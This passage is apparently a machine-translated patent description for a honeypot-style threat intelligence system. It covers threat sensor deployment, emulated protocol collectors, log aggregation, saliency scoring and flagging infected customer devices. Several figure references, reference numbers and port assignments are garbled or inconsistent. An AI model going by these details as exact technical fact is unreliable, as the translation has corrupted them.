[0127] The threat sensor deployment and management component 202 can extend deployment and / or configuration from a single threat sensor to multiple threat sensors. The threat sensor deployment and management component 202 can manage the configuration and deployment of threat sensors 204…214 and each threat data collector associated with a threat sensor, such as threat data collectors 206, 208, 210, and 212 associated with threat sensor 1 204, and threat data collectors 216, 218, and 220 associated with threat sensor n. In some embodiments, the threat sensor deployment and management component 202 can deploy threat sensors in a large number of areas, and a large number of threat sensors may exist in each area. In some embodiments, the threat sensor deployment and management component 202 can also manage threat sensors 204…214. In some embodiments, it can determine the type of threat data collectors 206, 208, 210, 212, 216, 218, and 220, the type of interaction implemented by each threat data collector, its functionality, and its configuration.

[0128] For example, the threat sensor deployment and management component 202 can determine whether the threat data collectors 206, 208, 210, 212, 216, 218, and 220 are of medium or low interaction. In some embodiments, the threat sensor deployment and management component 202 can also determine the number and type of threat data collectors 206, 208, 210, 212, 216, 218, and 220 that make up each threat sensor 204…214. In some embodiments, the threat sensor deployment and management component 202 can determine the time frame for threat sensor operation, as well as the startup, restart, and distribution of threat sensors. For example, threat sensor 1 204 has a lifetime of 2 hours, while threat sensor n 214 has a lifetime of 1 day.

[0129] In some embodiments, the threat sensor deployment and management component 202 may perform these management functions by determining a deployment plan. In some embodiments, the threat sensor deployment and management component 202 may determine a deployment plan for a plurality of threat sensors, wherein each threat sensor specifies one or more threat data collectors of a plurality of different types.

[0130] In some embodiments, at least some of the different types of threat data collectors may use different communication protocols or communication ports, or provide different responses to inbound communications. For example, threat data collector 206 of threat sensor 1 204 operates based on the FTP protocol, can operate on ports 20 and 21, and can respond to inbound communications with different headers. As another example, threat data collector 208 of threat sensor 1 204 operates based on the SSH protocol, can operate on ports 22 and 23, and can respond to inbound communications with Unix headers. As another example, threat data collector 210 of threat sensor 1 204 operates based on the Telnet protocol, can operate on port 23, and can respond to inbound communications with different headers. As another example, threat data collector 212 of threat sensor 1 204 operates based on the HTTP protocol, can operate on ports 80, 443, or 8008, and can respond to inbound communications with a set of web pages. As another example, threat data collector 216 of threat sensor n 214 operates based on the FTP protocol, can operate on port 21, and can respond to inbound communications with macOS headers. As another example, the threat data collector 218 of the threat sensor n214 operates based on the SSH protocol, can operate on port 22, and can respond to inbound communications with different headers. As a final example, the threat data collector 220 of the threat sensor n214 operates based on the Gopher protocol, can operate on port 30, and can respond to inbound communications with Unix headers.

[0131] In some embodiments, the deployment plan of the threat sensor deployment and management component 202 may also specify different lifespans for the threat sensors. For example, threat sensor 1 204 may have a lifespan of 2 hours, while threat sensor n 214 may have a lifespan of 1 day. In some embodiments, the threat sensor deployment and management component may deploy the multiple threat sensors at multiple different network addresses in multiple different geographical regions and configure them according to the deployment plan. For example, threat sensor 1 may be deployed at IP address “xxx.xxx.54.173”, and threat sensor n may be deployed at IP address “xxx.xxx.143.21”.

[0132] The threat data collector can then receive inbound communications and record interactions with the sources of those interactions. In some embodiments, these sources of interactions may be potential malicious actors, such as potential malicious actor 222 at IP address “yyy.yyy.yyy.yyy”, potential malicious actor 224 at IP address “zzz.zzz.zzz.zzz”, and potential malicious actor 226 at IP address “vvv.vvv.vvv.vvv”. In some embodiments, the threat sensor deployment and management component 202 can collect threat data from deployed threat sensors 204, 214 and determine an adjusted deployment plan based on the collected threat data and the different lifetimes of the threat sensors, including one or more adjustments to the deployment plan. In some embodiments, the threat sensor deployment and management component can perform adjustments to the threat sensors in one or more geographic regions according to the adjusted deployment plan.

[0133] Figure 3 Other aspects of an example system of distributed threat sensor data aggregation and data export component 302 are shown, which receives streams of sensor logs 314, 316, and 318 from a data streaming service 320, which receives data, such as sensor log 322, from multiple threat sensors 324, 326, 328, 330, and 332. Distributed threat sensor data aggregation and data export component 302 includes a sensor log aggregation component 306 for aggregating sensor logs into a threat sensor attack table 304 for the current day or corresponding date. According to some embodiments, distributed threat sensor data aggregation and data export component 302 may also include a saliency score determiner 308 for calculating saliency scores 310 for each source interacting with the threat sensors.

[0134] In some embodiments, suspicious object interaction data collected by threat sensors 324, 326, 328, 330, and 332 can be moved through a processing pipeline to enhance, aggregate, organize, and generate actionable threat intelligence outputs for use as a subset of factors in making security decisions. Interactions from the threat data collectors of threat sensors 324, 326, 328, 330, and 332 can be collected in some form of sensor log 322 and passed to a central data streaming service 320, which can form a sensor log stream. Figure 3In the sequence, the sensor log stream consists of sensor log m 314, sensor log m+1 316, and sensor log m+2 316. Sensor log 314 originates from threat sensor n with IP address “xxx.xxx.143.21”. Sensor log 314 contains information about interaction with the source IP “zzz.zzz.zzz.zzz” using the FTP protocol on port 21. It also contains information about the interaction time and the received interaction payload. Sensor log 316 originates from threat sensor 1 with IP address “xxx.xxx.54.173”. Sensor log 316 contains information about interaction with the source IP “yyy.yyy.yyy.yyy” using the SSH protocol on port 23. It also contains information about the interaction time and the received interaction payload. Sensor log 318 also originates from threat sensor 1 with IP address “xxx.xxx.54.173”. Sensor log 318 contains information about an interaction using the FTP protocol on port 21 with the source IP "yyy.yyy.yyy.yyy". It also contains information about the interaction time and the received interaction payload.

[0135] In some embodiments, the sensor log aggregation component 306 of the distributed threat sensor data aggregation and data export component 302 can aggregate all data into a single format for easier processing. The sensor log aggregation component 306 can aggregate data into a threat sensor attack table 304 for the current day or corresponding date. For example, the table may include the IP address of the interaction source, the time of the last interaction, the number of threat sensors hit by the interaction from said source, the number of ports hit by the interaction from said source, the various protocols used for the interaction from said source, and the different payloads downloaded to the threat data collector through said source.

[0136] According to some embodiments, the distributed threat sensor data aggregation and data export component 302 may include a saliency score determiner 308 for calculating saliency scores 310 for each source interacting with the threat sensors. The saliency score determiner 308 may use an aggregated threat sensor attack table 304 for the current or corresponding date, as well as historical data 312 from the current and previous days from a threat sensor attack database, to calculate the saliency scores. Figure 3 In the example shown, the saliency score determiner 308 calculated a saliency score of 52 for IP address “yyy.yyy.yyy.yyy”, a saliency score of 87 for IP address “zzz.zzz.zzz.zzz”, and a saliency score of 27 for IP address “vvv.vvv.vvv.vvv”.

[0137] In some embodiments, many threat indicators, such as IP addresses, may be too volatile to trigger security alerts independently of other forms of security analysis. Therefore, in some embodiments, the threat intelligence system 100 and / or the distributed threat sensor data aggregation and data export component 202 may periodically export IP reputation data as one of its threat indicator outputs. This may be accomplished by the notification module 312. In some embodiments, the distributed threat sensor data aggregation and data export component may periodically, for example, every 10 minutes, export an updated version of its IP address reputation knowledge. In some embodiments, these exports may contain metadata about each suspicious IP address interaction, such as the interacting sensor, protocol, port, direction, URL, and number of observation days. For example, the notification module 312 may export saliency scores and / or received or modified sensor log streams to one or more of the following: a data storage area, a database for more in-depth type analysis, distributed threat sensor analysis and related services and / or a user interface or dashboard.

[0138] Figure 4 Other aspects of an example system of distributed threat sensor analysis and correlation component 402 are shown, which receives and / or calculates saliency scores associated with the source of the interaction from and / or through saliency score determiner 408. According to some embodiments, distributed threat sensor analysis and correlation component 402 further includes a malicious actor determiner 420 for identifying malicious actors, a malicious actor storage device 430 for storing the identifiers of malicious actors, a known device infection correlater 440 for associating malicious actors with known devices in the network to identify infected known devices, and a notification module 450 for subsequently providing some form of notification regarding the infected known devices.

[0139] In some embodiments, distributed threat sensor analysis and related components 402 can determine that the interaction originates from one or more known instances owned or controlled by the provider network. These known instances may be devices in provider network 463, devices in client networks 464, 466, or known IoT devices 468. In some embodiments, a mechanism may be used to prevent the abuse of these types of known or controlled instances, servers, or devices. Often, the clients of the provider network themselves may be victims of malicious actors; for example, malicious actors may take over their accounts or instances and begin spreading malware that infects said instances, servers, or devices to other targets. Therefore, these threatened instances, servers, or devices of the provider network may also ultimately hit the threat sensors and threat data collectors of the threat intelligence system.

[0140] In some embodiments, when a client of the provider network is itself a victim of a malicious actor, the provider network can notify the client that its instance, server, or device is threatened. This can be accomplished by notification module 450. In some embodiments, the notification module may communicate with a client-provided function execution service 490, cloud reporting service 492, messaging service 494, or IoT console service 496. In some embodiments, these may be services of the provider network.

[0141] Figure 5 An example system environment is shown as a part of a threat intelligence system according to some embodiments, wherein multiple threat sensors provide sensor logs to a sensor log acquisition / analysis service, the sensor log acquisition / analysis service provides threat intelligence tables to a threat intelligence export service, and the threat intelligence export service provides data to a threat intelligence related service, wherein the example system includes several other components and services.

[0142] Figure 5 Disclosed are multiple computing instances 556 distributed across multiple regions according to some embodiments, wherein one or more instances may be associated with a threat sensor (“TS”). Each threat sensor may be assigned a different IP address. Threat sensors may be of different types and may also include different types of threat data collectors. Threat sensors may also have different lifetimes. Threat sensors may have some or all of the attributes and characteristics of the threat sensors and threat data collectors discussed earlier. Logs of interactions from some or all of the threat sensors can then be collected in a sensor log group 548, which may then be streamed in a sensor log stream 548. The sensor log stream 538 may be streamed to a sensor log acquisition / analysis service 540. In some embodiments, the sensor log acquisition / analysis service 540 may be part of a distributed threat sensor data aggregation and data export component.

[0143] Sensor log acquisition / analysis service 540 can perform initial analysis and injection of sensor logs in a stream. Sensor log acquisition / analysis service 540 can aggregate data for output in threat intelligence table 536, and can also output raw sensor logs to separate sensor log data storage area 544 and sensor log database 546. Sensor log acquisition / analysis service 540 can use its own sensor log stream 542 to output this data to the data storage area and database. In some embodiments, data in sensor log data storage area 544 and sensor log database 546 can be used for manual data analysis. For example, database queries can be run to see what interesting information is in the sensor logs. For example, a threat analyst can run custom queries on this data.

[0144] The sensor log acquisition / analysis service 540 can also consider the source of external information. The sensor log acquisition / analysis service 540 can consider the geographic location mapping and / or ISP mapping of IP addresses to provide more context for the source IP address from the sensor log stream 538 being processed. The geographic location mapping and ISP mapping of IP addresses can initially be received from the geographic / ISP import event stream 504 input to the geographic / ISP import service 518, where the information is stored in the geographic / ISP data storage area 534, and ultimately usable by the sensor log acquisition / analysis service 540. The sensor log acquisition / analysis service 540 can also consider external threat intelligence to compare threat intelligence received from threat sensors with external threat intelligence sources. External threat intelligence can initially be received from the external threat intelligence import event stream 502 input to the external threat intelligence import service 516, where the information is stored in the external threat intelligence import data storage area 532, and ultimately usable by the sensor log acquisition / analysis service 540. External information sources can be used for additional information in the threat intelligence form 536 entry, as well as can be stored together with the raw sensor logs in the sensor log data storage area 544 or database 546.

[0145] In some embodiments, threat intelligence table 536 may aggregate information about each IP address over a specific time period. In some embodiments, this specific time period may be one day. For example, for each source IP address, a record may be made in threat intelligence table 536 daily. For example, the record may include, during the time period (e.g., one day), what the target port is, what payload category the payload from the source is classified into, what service the source interacts with, what threat sensor the source interacts with, what protocol the source uses, and whether the source participated in inbound, outbound, or both inbound and outbound interactions. In some embodiments, threat intelligence table 536 may provide a retention period of several time periods for each record (e.g., 30 days). For example, a scrolling window may be available, such as a 30-day scrolling window. In some embodiments, this scrolling window may be available for each source address (e.g., IP address) that interacts with at least one threat sensor. Therefore, in some embodiments, if a source address is inactive during the time period of the scrolling window (e.g., 30 days), information about that source address may be deleted from threat intelligence table 536.

[0146] In some embodiments, due to the aggregated data in threat intelligence table 536, data about source addresses can be quickly found and exported without reviewing sensor logs. In some of these embodiments, data can also be exported very frequently. This data export can be performed by threat intelligence export service 220. In some embodiments, threat intelligence export server 220 can export all information for all IP addresses in threat intelligence table 536 every 10 minutes. In some embodiments, there may be 600,000 to 1 million IP addresses exported every 10 minutes per day. Each IP address has very recent exported threat intelligence. Performing this process using raw interaction logs or any other type of system would be very expensive.

[0147] Threat intelligence export service 520 may be part of a distributed threat sensor data aggregation and export component, and it can export based on received threat intelligence export events 506. Threat intelligence export service 220 can export IP address information from threat intelligence table 536 to threat intelligence export event data storage area 506, which can then store the data in threat intelligence database 510, and / or it can export to threat intelligence metrics 522, which can be displayed on dashboard 554. Dashboard 554 can acquire / analyze information from sensor logs, metrics 552, threat intelligence metrics 522, threat intelligence export event data storage area 508, and / or threat intelligence-related metrics 556, and provide a dashboard representation to system clients or administrators.

[0148] Threat intelligence-related service 524 may be part of a distributed threat sensor analysis and related component. It uses data output from threat intelligence export event data storage area 508 by threat intelligence export service 520 to cross-correlate threat intelligence from threat intelligence export event data storage area 508 with logs from external devices. These logs from external devices may be logs from known devices, such as servers in a provider network, compute instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network. Threat intelligence-related service 524 can determine that external and / or known devices are threatened in order to take actions such as isolating the threatened devices.

[0149] Logs from external devices can be received by an external device event notification service 514, which feeds notifications to an external device event queue 512. A threat intelligence-related service 524 can output cross-correlation data to a threat intelligence-related stream 526, which can stream the data to a threat intelligence-related data storage area 528, whereby the storage area stores the data in a threat intelligence-related database 530. The threat intelligence-related service 524 can also output cross-correlation data to a threat intelligence-related log group 538, which can send threat intelligence-related metrics 556 to a dashboard 554.

[0150] Threat intelligence systems in provider networks

[0151] Figure 6 The illustration depicts an instance provider network environment for a threat intelligence system 600 according to some embodiments, wherein the threat intelligence system is partially implemented by an event-driven computing service 610b, an object storage service 610e, a database service 610c, and a data streaming service 610d, and wherein deployed threat sensors and potential malicious actors are implemented by a computing instance service 610a of a provider network 602. However, these instance provider network environments are not intended to be limiting.

[0152] Figure 6 A threat intelligence system 600 is illustrated in an instance provider network environment 602 according to at least some embodiments. The service provider network 600 may provide computing resources 620, 630, 650 to a client 660 via one or more computing services 610a or event-driven computing services 610b. The service provider network 602 may be operated by entities to provide the client 660 with one or more services accessible via the Internet and / or other networks 690, such as various types of cloud-based computing or storage services. In some embodiments, the service provider network 602 may implement web servers, such as hosting e-commerce websites. The service provider network 602 may comprise a collection of data centers hosting various resource pools, such as physical and / or virtualized computer servers, storage devices, networking devices, etc., which are necessary for implementing and distributing the infrastructure and services provided by the service provider network 602. In some embodiments, the service provider network may use computing resources 620, 630, 650 for the services it provides. In some embodiments, these computing resources 620, 630, 650 may be provided to the client 660 in units referred to as “instances” (e.g., virtual computing instances).

[0153] Provider network 602 may provide resource virtualization to clients via one or more virtualization services that allow clients to access, purchase, rent, or otherwise acquire instances of virtualized resources, including but not limited to computing and storage resources implemented on devices within one or more provider networks in one or more data centers. In some embodiments, a private IP address may be associated with a resource instance; the private IP address is the internal network address of the resource instance on provider network 602. In some embodiments, provider network 602 may also provide clients with public IP addresses and / or ranges of public IP addresses (e.g., Internet Protocol version 4 (IPv4) or Internet Protocol version 6 (IPv6) addresses) that can be obtained from provider 602.

[0154] Typically, provider network 602, via virtualization services, allows service provider clients (e.g., clients operating client 660) to dynamically associate at least some public IP addresses assigned to or allocated to the client with specific resource instances assigned to the client. Provider network 602 also allows clients to remap public IP addresses previously mapped to a virtualized computing resource instance allocated to the client to another virtualized computing resource instance also allocated to the client. For example, using virtualized computing resource instances and public IP addresses provided by the service provider, a service provider client, such as the operator of client 660, can implement client-specific applications and present the client's applications on an intermediate network 690, such as the Internet. Then, client 660 or other network entities on intermediate network 690 can generate traffic to target domain names published by client 660. Initially, client 660 or other network entities can request a connection to one of multiple computing instances 620, 630, and 650 via a load balancer.

[0155] The load balancer can respond using identification information that may include its own public IP address. Then, other network entities on client 660 or intermediate network 690 can generate traffic to the public IP address received by the router service. The traffic is routed to the service provider's data center, where it is routed via the network substrate to the private IP address of the network connection manager currently mapped to the target public IP address. Similarly, response traffic from the network connection manager can be routed back to intermediate network 640 via the network substrate and then to the source entity.

[0156] The private IP address used here refers to the internal network address of a resource instance within the provider network. Private IP addresses can only be routed within the provider network. Network traffic originating outside the provider network is not directly routed to the private IP address; instead, the traffic uses the public IP address mapped to the resource instance. The provider network may include network devices or apparatuses that provide Network Address Translation (NAT) or similar functionality to perform mappings from public IP addresses to private IP addresses and from private IP addresses to public IP addresses.

[0157] The public IP addresses used here are internet-routable network addresses assigned to resource instances by service providers or clients. Traffic routed to public IP addresses is translated, for example via 1:1 Network Address Translation (NAT), and forwarded to the appropriate private IP address of the resource instance. Some public IP addresses may be assigned to specific resource instances by the provider's network infrastructure; these public IP addresses may be referred to as standard public IP addresses, or simply standard IP addresses. In at least some embodiments, the mapping from standard IP addresses to the private IP addresses of resource instances is the default startup configuration for all resource instance types.

[0158] At least some public IP addresses can be assigned to or obtained by clients of provider network 602; clients can then assign their assigned public IP addresses to specific resource instances assigned to them. These public IP addresses can be referred to as client public IP addresses, or simply client IP addresses. Client IP addresses can be assigned to resource instances by the client, for example via an API provided by the service provider, rather than by provider network 602 as standard IP addresses are assigned. Unlike standard IP addresses, client IP addresses are assigned to client accounts and can be remapped to other resource instances by the appropriate client as needed or required. Client IP addresses are associated with client accounts, not specific resource instances, and the client controls the IP address until the client chooses to release it. Client IP addresses can be resilient IP addresses. Unlike traditional static IP addresses, client IP addresses allow clients to mask resource instance or availability zone failures by remapping their public IP addresses to any resource instance associated with their client account. For example, client IP addresses enable clients to resolve client resource instance or software issues by remapping their client IP addresses to a replacement resource instance.

[0159] Provider network 602 can provide client 660 with computing services 610a or event-driven computing services 610b implemented by physical server nodes, which include multiple computing instances 620 and 630. The computing services also contain a number of other server instances 650 for numerous other clients and customers of provider network 602. As another example, provider network provides virtualized data storage services or object storage services 6103 implemented by physical data storage nodes, which may include multiple data storage instances. Data storage services or object storage services 610e can store client files, which are accessed by the corresponding server instance of the client via file access 649. As another example, provider network can provide virtualized database services 610c implemented by database nodes, which include at least one database instance of the client. Server instances belonging to clients in the computing services can access database instances belonging to clients via database access 648 when needed. The database service may contain a database instance containing a threat sensor attack database 670 for the current and previous days. The database service and data storage services also contain multiple file or database instances belonging to other clients and customers of provider network 602. The provider network may also include multiple other client services belonging to one or more customers. For example, provider network 602 may include a data streaming service 610d provided to customers. This data streaming service 610d may include a sensor log data stream 680 that receives sensor data 645 from threat sensor 640 and delivers sensor data stream 647 to server instance 620 of threat intelligence system 600. For example, client 660 may access any of client services 610a, 610b, 610c, 610d, or 610e via an interface, such as one or more APIs of the service, to obtain information on the usage of resources (e.g., data storage instances, files, database instances, or server instances) implemented on multiple nodes of the service in the production network portion of provider network 602.

[0160] exist Figure 6In the illustrated embodiments, some or all of the multiple server instances 620 of the event-driven computing service 620a are used to implement various hosts of the threat intelligence system 600, such as threat sensor deployment and management components, distributed threat sensor data aggregation and export components, or distributed threat sensor analysis and related components. Additionally, a database instance in the database service 690c is used to host a threat sensor attack database 670 for the current and previous days, as a table in the database instance. As previously described, the multiple server instances 620 of the various hosts used to implement the threat intelligence system 600 can access the table 670 in the database service 610c via database access 648. In these embodiments, the multiple server instances 620 act as hosts for the threat intelligence system 600, and the computing service 610a deploys 622 multiple server instances 630 as threat sensors 640. For example, multiple different server instances 650 of the computing service 610a owned by a client 660 may be infected with malware, thus becoming malicious actors 651. These malicious actors 651 can initiate malicious interactions 655 with the threat sensors 640. Threat sensor 640 can detect and collect information about malicious interactions 655 and generate sensor data 645, which can be sent to sensor log data stream 680 of data streaming service 610d. Sensor log data stream 680 is part of threat intelligence system 600. Sensor log data stream 680 can also stream sensor data 647 to one or more event-driven computing instances 620 of event-driven computing service 610b.

[0161] An Explanatory Approach to Threat Intelligence Systems

[0162] Figure 7 This is a flowchart illustrating an illustrative method that can be implemented by a threat sensor deployment and management component according to some embodiments, wherein the threat sensor deployment and management component determines a deployment plan, deploys multiple threat sensors, collects threat data from the deployed threat sensors, determines an adjusted deployment plan, and performs the adjustment of the deployment plan.

[0163] Figure 7The flowchart begins at box 710: The threat sensor deployment and management component determines a deployment plan for the plurality of threat sensors, wherein each threat sensor includes one or more threat data collectors of multiple different types, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors. The flowchart proceeds to box 720, where the threat sensor deployment and management component deploys the plurality of threat sensors at different network addresses in multiple different geographic regions and configures them according to the deployment plan. The flowchart continues to box 730: Threat data is collected from the deployed threat sensors. At box 740, the threat sensor deployment and management component determines an adjusted deployment plan based on the collected data, including one or more adjustments to the deployment plan. The flowchart then proceeds to box 750: Adjustments to the threat sensor deployment plan are performed in one or more geographic regions. In some embodiments, the flowchart may then iteratively execute steps 730, 740, and 750 to collect additional data, determine additional adjustments to the deployment plan, and execute the adjusted deployment plan.

[0164] Figure 8 This is a flowchart illustrating a method that can be implemented by a threat sensor and a selected threat data collector of the threat sensor according to some embodiments. Figure 8 The process begins by receiving inbound communications at a specific port via a threat sensor and determining the source IP address of the inbound communications. The flowchart proceeds to box 820: Determine if a threshold number of inbound communications has been received from the source. If the threshold number of inbound communications has been received from the source, the flowchart simply returns to 810, as the threat sensor does not want to disproportionately distort its collected data by using data from only a single source. If the threshold number of inbound communications has not been received from the source, the flowchart proceeds to box 830: Determine if a protocol can be determined based on the inbound communications. If a protocol can be determined based on the inbound communications, the flowchart proceeds to 834: Select an appropriate threat data collector to respond to the inbound communications for the protocol. If a protocol cannot be determined based on the inbound communications in box 830, the flowchart proceeds to box 832: Select a threat data collector to respond by using a weighted random selection among the appropriate threat data collectors.

[0165] Regardless of which branch is taken in box 830, the flowchart eventually moves to box 840: the threat data collector selects a banner to respond to inbound communications and uses that banner to respond to the inbound communications. The flowchart then moves to box 850: the threat data collector determines how much data to capture from the inbound communications and captures the appropriate amount of data. The flowchart then moves to box 860: determining whether the threat data collector should perform outbound communications. If the threat data collector should perform outbound communications, it identifies the network address present in the inbound communications in box 865 and initiates outbound communications to that network address to determine additional information useful for threat intelligence. However, if the threat data collector should not perform outbound communications, and after executing box 865, the flowchart proceeds to 870: generating a log entry containing the source IP address of the inbound communications and one or more of the following: target port, payload classification, protocol used, threat sensors involved, and whether the interaction includes an outbound-initiated connection. This log entry is then transmitted to the central log entry stream in box 875. Finally, the flowchart in box 880 determines whether the threat sensor's lifetime has expired. If the lifetime has expired, the flowchart in box 890 terminates the threat sensor. If the lifetime has not expired, the flowchart returns to box 810, where the threat sensor again receives inbound communication at a specific port and determines the source IP address of the inbound communication.

[0166] Figure 9 This is a flowchart of an illustrative method that can be implemented by a distributed threat sensor data aggregation and data derivation component according to some embodiments, wherein the distributed threat sensor data aggregation and data derivation component receives a sensor log stream containing information about interactions with threat sensors, aggregates the information in the sensor logs according to the source of the interaction, calculates a salience score for the source, and provides the salience score to other targets, wherein the salience score includes the likelihood that the source is involved in threat network communications.

[0167] The flowchart begins at box 910, where the distributed threat sensor data aggregation and data derivation component receives sensor log streams from multiple threat sensors, each log containing information about interactions with the threat sensors, and said information including identifiers of the interaction sources. The flowchart then moves to box 920, where the distributed threat sensor data aggregation and data derivation component aggregates information about interactions with the threat sensors from the sensor log streams received from the multiple threat sensors within a defined time period, according to the identifiers of the interaction sources, into aggregated information about the interactions for each source within the defined time period. The flowchart then moves to 930, where the distributed threat sensor data aggregation and data derivation component calculates saliency scores for each source of the interaction, at least in part, based on the aggregated information about the interactions, where each saliency score includes the probability that a source is involved in threat network communication. Finally, the flowchart moves to 940, where the distributed threat sensor data aggregation and data derivation component provides at least some saliency scores from at least some sources of the interactions to one or more targets.

[0168] Figure 10 This is a more detailed flowchart of an illustrative method, implemented by a distributed threat sensor data aggregation and data export component according to some embodiments, wherein the distributed threat sensor data aggregation and data export component receives a sensor log stream containing information about interactions with threat sensors, has access to additional information to modify the sensor logs, aggregates information from the sensor logs according to the source of the interaction, accesses historical data, calculates a salience score for the source, and exports the salience score and / or the sensor logs to one or more targets, wherein the salience score includes the likelihood that the source is involved in threat network communications.

[0169] The flowchart begins at box 1010: receiving sensor log streams from multiple threat sensors, where each log in the sensor log stream includes the source IP address of the interaction and other information about the interaction. Then, in box 1020, it is determined whether information mapping geographic location and / or external ISP to source identifiers is accessible. If such information is accessible, the flowchart proceeds to box 1025: modifying some sensor logs based on the information associating geographic location and / or external ISP with the identifier of the interaction source. If such information is not accessible, and after performing step 1025, the flowchart proceeds to box 1030: determining whether external threat intelligence is accessible. If external threat intelligence is accessible, then box 1035 is executed: modifying some sensor logs based on the received external threat intelligence. If such information is not accessible, and after performing step 1035, the flowchart proceeds to box 1040, where, for example, a distributed threat sensor data aggregation and data export component aggregates other information about the interaction within the current time period into aggregated information about the interaction organized according to the identifier of the interaction source. Then, in box 1050, historical data on interactions from previous time periods, aggregated according to the identifiers of the sources of previous interactions, is accessed. Next, in box 1060, based on the latest aggregated information and historical data, a saliency score for the interaction source is calculated, where the saliency score contains the probability that the source participated in threat network communications. Finally, the flowchart turns to box 1070: the saliency score and / or the received or modified sensor log stream are exported to one or more of the following: a data storage area, a database for more in-depth type analysis, distributed threat sensor analysis and related services and / or a user interface or dashboard.

[0170] Figure 11 This is a flowchart illustrating a method, according to some embodiments, for calculating a salience score of a source interacting with one or more threat sensors, which can be implemented by a distributed threat sensor data aggregation and data derivation component or a distributed threat sensor analysis and correlation component. To calculate the salience score, the flowchart begins at box 110: receiving aggregated information from the interaction source for the current time period regarding interactions leading to the threat sensor, and receiving aggregated information from the source for previous time periods.

[0171] The flowchart then sets the time period to the current time period and significance score = 0, beginning a loop including 1120, 1130, 1140, 1150, and 1155. The flowchart moves to box 1130: Based on the recency of the interaction between the source and the threat sensor, and the number of different threat sensors to which the logs of the source belong, the flowchart determines the significance score for this time period. In box 1140, the flowchart calculates a new significance score by adding the significance score for this time period to the total number of runs for significance scores. If there are other time periods in 1150, the flowchart sets the time period used in the loop to the previous time period in 1155 and starts the loop again in 1120. Therefore, the flowchart calculates multiple time period significance scores for multiple different time periods and adds each significance score to the cumulative total. The final significance score total is the sum of the significance scores for all relevant time periods.

[0172] Once the loop completes and there are no remaining time cycles in box 1150, the flowchart moves to box 1160: Adjust the salience score based on one or more of the following: the aggressiveness of the interaction source, the classification of payloads received from the interaction source, the number of ports interacting with the source, the total number of threat sensors interacting with the source, or the number of outbound connections associated with the source. The flowchart determines in box 1170 whether there is an indication that the salience score is too high. If there is an indication that the salience score is too high, the flowchart moves to 1175: Based on the indication that the salience score is incorrectly too high, modify the salience score to the lower threshold. If there is no indication that the salience score is too high in 1170, and if there is an indication that the salience score is too high, after executing 1175, the flowchart ultimately simply returns the salience score in 1180.

[0173] Figure 12 This is a flowchart of an illustrative method, implemented by distributed threat sensor analysis and related components, according to some embodiments, wherein the distributed threat sensor analysis and related components obtain saliency scores of different sources interacting with threat sensors, determine which sources are malicious actors based on the saliency scores, receive identifiers of known actors, such as servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network, and associate malicious actors with known actors to identify which known actors may be infected with malware.

[0174] The flowchart begins at 1210: Obtaining multiple identifiers of sources interacting with multiple threat sensors and salience scores associated with individual identifiers among the multiple identifiers. The flowchart proceeds to 1220: Identifying malicious actor identifiers as a subset of the multiple individual identifiers, at least in part based on the salience scores. The flowchart proceeds to 1230: Receiving identifiers of known actors, where known actors may include: servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network. The flowchart then proceeds to 1240: Associating the identifiers of the malicious actors with the identifiers of the known actors to identify one or more of the known actors as infected with malware.

[0175] Following box 1240, the flowchart can implement one or more different notification actions. It can provide the target with an indication of one or more known devices infected with malware in box 1250. It can also trigger the execution of a customer-supplied function in box 1260. It can also send a message to a remote network in box 1270, indicating the infected known device. Alternatively, the flowchart can terminate the certificates of the infected known device, such as security certificates, in box 1280.

[0176] Logic diagram of additional details for threat sensors

[0177] Figure 13 This is a logical diagram of a threat sensor containing multiple different threat data collectors according to some embodiments, wherein the threat data collectors receive inbound communications from potential malicious actors, and wherein low-interaction threat data collectors are designed to capture interactions on service ports via TCP and UDP, as well as ICMP messages, while medium-interaction threat data collectors are used for Telnet, SSH, and SSDP / UPnP. This diagram shows several different threat data collectors that can be implemented on a single threat sensor. First, there is a low-interaction threat data collector 1304 over TCP / UDP and ICMP. Also present are a telnet threat data collector 1306, an SSH threat data collector 1308, and an SSDP / UPnP threat data collector 1310. Various other threat data collectors may also exist in any given threat sensor, including all or some of the illustrated threat data collectors, or none of them, and the illustrated threat data collectors are for illustrative purposes only.

[0178] In some embodiments, different threat data collectors are designed to capture any interactions on all service ports via TCP, UDP, and ICMP messages. In some embodiments, in the case of TCP interactions, the threat data collectors complete a handshake, and then they can capture up to 10KB of network payload before closing the connection. In some embodiments, in TLS interactions via TCP, the threat data collectors can be configured to complete a TLS handshake to access suspicious payloads in plaintext. In some embodiments, for UDP and ICMP interactions, the threat data collectors of the threat intelligence system can capture up to 10KB of network payload on the received messages. In some embodiments, these payloads can have threat intelligence value because they typically also contain other threat indicators, such as links to malware distribution points and information about threat actors and the attack vectors used.

[0179] In some embodiments, in addition to these low-interaction threat data collectors, the threat sensors of the threat intelligence system may also be equipped with a medium-interaction threat data collector 1306 for Telnet, a medium-interaction threat data collector 1308 for SSH, and a medium-interaction threat data collector 1310 for SSDP / UPnP. In some embodiments, these threat data collectors emulate the functionality of their corresponding real services, guiding the interaction of suspicious objects to reveal more information, such as malware samples and the network location of reports and command and control servers. In some embodiments of these embodiments, emulation methods, such as using fake shells, ensure the integrity of the sensor itself is protected and that suspicious objects cannot tamper with its operation.

[0180] Figure 13 Table 1302 at the top of the table displays some information collected by the threat data collector for interactions. The table has the following labels: the source address of the interaction source, labeled "srcaddr"; the target port on the threat sensor interacting with the source, labeled "dstport"; and the payload received by the threat data collector from the source, labeled "payload". The top table contains information on interactions collected by the low-interaction threat data collector 1304 over TCP / UDP and ICMP, and the SSDP / UPnP threat data collector 1310.

[0181] Figure 13Table 1312 at the bottom of the table displays some information collected by the threat data collector for the interaction. The table has the following labels: the source address of the interaction source, labeled "srcaddr"; the target port on the threat sensor interacting with the source, labeled "dstport"; and the session with the source recorded using the protocol assigned to the threat data collector for the interaction, labeled "session". Table 1312 at the bottom contains information collected for the interaction between telnet threat data collector 1306 and SSH threat data collector 1308. The first row of 1312 contains information collected during the telnet session on target port 23, and the bottom row of 1312 contains information collected during the SSH session on target port 22.

[0182] Figure 14 The diagram, based on some embodiments, illustrates the retrieval and storage of malware samples in a data storage area for further static and dynamic analysis regarding interactions between threat sensors and / or threat data collectors and external malware distribution points, wherein retrieved files are recursively acquired and analyzed for further outbound citations.

